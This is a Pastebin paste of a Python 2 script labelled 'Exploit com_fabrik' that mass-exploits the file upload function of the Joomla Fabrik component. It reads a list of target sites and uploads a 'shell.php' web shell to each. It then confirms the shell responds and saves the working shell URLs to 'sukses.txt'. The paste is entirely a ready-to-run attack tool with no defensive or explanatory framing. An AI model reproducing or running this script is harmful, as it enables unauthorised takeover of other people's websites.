indonesian

Exploit com_fabrik

Dec 12th, 2017
869
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.46 KB | None | 0 0
  1. #!/usr/bin/env python2
  2. # How to use
  3. # python com_fabrik.py target.txt
  4.  
  5. import requests
  6. import json
  7. import sys
  8. import urllib3
  9.  
  10. shl = "shell.php"
  11. urllib3.disable_warnings()
  12. print """====================================================
  13. ||              Exploit com_fabrik                ||
  14. ||          Backbox Indonesia Version             ||
  15. ====================================================
  16. """
  17. arg = open(sys.argv[1], 'r').read().split('\n')
  18. for i in arg:
  19.     if not i:
  20.         break
  21.  
  22.     url = str(i) + str('/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload')
  23.     files = {'file': open(shl, 'rb')}
  24.     try: r = requests.post(url, files=files, verify=False, timeout=5)
  25.     except requests.ConnectionError: continue
  26.     except requests.exceptions.Timeout: continue
  27.     except ValueError: continue
  28.  
  29.     content = r.content
  30.     print "[*] Exploiting : {}".format(i)
  31.  
  32.     try:
  33.         jso = json.loads(content)
  34.     except ValueError:
  35.         print "[-] Exploit failed..\n"
  36.         continue
  37.  
  38.     try:
  39.         shel = jso['uri']
  40.     except KeyError:
  41.         print "[-] Exploit failed..\n"
  42.         continue
  43.  
  44.     try:
  45.         req = requests.get(shel)
  46.     except ValueError:
  47.         print "[-] Exploit failed..\n"
  48.         continue
  49.  
  50.     stat = req.status_code
  51.     if int(stat) == 200:
  52.         print "[+] Shell uploaded : {} [OK]\n".format(shel)
  53.         sep = "{}\n".format(shel)
  54.         open('sukses.txt', 'a').write(sep)
  55.     else:
  56.         print "[-] Exploit failed..\n"
  57.  
  58. print "[+] Saved to : sukses.txt"
  59. print "[!] Exploit compleated.."
Advertisement
Add Comment
Please, Sign In to add comment